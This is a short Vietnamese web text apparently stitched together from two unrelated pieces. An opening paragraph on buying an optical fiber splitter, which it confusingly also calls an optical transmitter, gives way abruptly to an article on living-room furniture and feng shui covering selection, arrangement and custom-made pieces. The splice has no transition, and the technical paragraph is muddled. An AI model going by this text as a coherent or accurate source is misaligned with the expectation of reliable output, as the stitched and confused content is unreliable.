Chọn mua bộ chia quang, bạn cần đảm bảo là các thông số kĩ thuật của nó đều đúng kĩ thuật. Bộ phát quang đóng vai trò quan trọng, giống như cổng nguồn đảm bảo thiết bị hoạt động hiệu quả nên chỉ cần một chút sai lệch thì toàn bộ hệ thống mạng trong ngôi nhà có thể bị ảnh hưởng.
 
 

Những điều nên tìm hiểu về đồ dùng phòng khách và phong thủy

Từ trước tới nay, người Việt luôn quan niệm nhiều điều phải phù hợp với phong thủy hoặc tránh kỵ với phong thủy để có thể đem lại những điều tốt lành nhất. Đối với phòng khách – không gian lớn mà các gia đình sử dụng để sinh hoạt chung, tiếp khách và những hoạt động mang tính tập thể khác cũng vậy, các đồ dùng trong địa điểm này cần có sự phù hợp với phong thủy để mang lại những điều mà gia chủ mong muốn. Hãy cùng chúng tôi bàn luận về vấn đề này trong bài viết sau đây nhé.
Việc lựa chọn đồ đạc
Khi muốn đồ dùng phòng khách phù hợp với phong thủy thì bạn cần thực hiện điều này ngay từ bước lựa chọn đồ đạc sẽ dùng trong phòng khách. Ngoài việc phải phù hợp với sở thích của người chủ và các thành viên trong gia đình thì chúng cũng cần có sự tương thích với đặc điểm sinh hoạt của người trong nhà. Bên cạnh đó, nó cũng cần có tính đồng nhất với phong cách chung của không gian phòng khách. Khi lựa chọn đồ đạc để trong phòng khách bạn nên quan tâm đến việc phối hợp chúng với tường, mặt sàn và những đồ dùng khác.
Việc bố trí, sắp xếp đồ đạc
Khi đã lựa chọn được những đồ dùng phòng khách theo các tiêu chí kể trên thì bạn cần tiến hành việc bố trí, sắp xếp đồ đạc sao cho phù hợp với tính phong thủy. Đa phần mọi người đều biết rằng đồ đạc trong nơi này không nên đặt quá nhiều bởi nó gây nên sự rối mắt nhưng đồng thời cũng không nên đặt quá ít bởi nó làm cho không gian trở nên trống rỗng. Phải làm sao sắp đặt vừa đảm bảo tính hài hòa nhưng cũng cần phải phù hợp với phong thủy. Những đồ đạc sử dụng để trang trí như tranh, ảnh cần đặc biệt quan tâm đến vị trí do nó có sự ảnh hưởng đến vận mệnh tài lộc của người gia chủ.
Đặt làm đồ đạc trong phòng khách được không?
Nhiều người khi đi chọn mua đồ đạc để trong phòng khách đã không ưng ý với những đồ làm sẵn hoặc đồ làm sẵn không phù hợp về kích thước nên có ý định đặt làm riêng. Điều này hoàn toàn là hợp lý bởi việc phù hợp với phong thủy không hề liên quan đến việc đặt làm riêng hay mua sẵn đồ đạc. Do đó, bạn có thể đặt làm đồ thiết kế nhưng cần quan tâm đến những điều đã nêu trong hai phần trước. bạn cũng cần chú ý đến chất liệu và chất lượng gia công đồ thiết kế ở nơi bạn đặt làm bởi không nên sử dụng đồ đạc gia đình có chất liệu không tốt và chất lượng kém vì nó sẽ rất nhanh hỏng.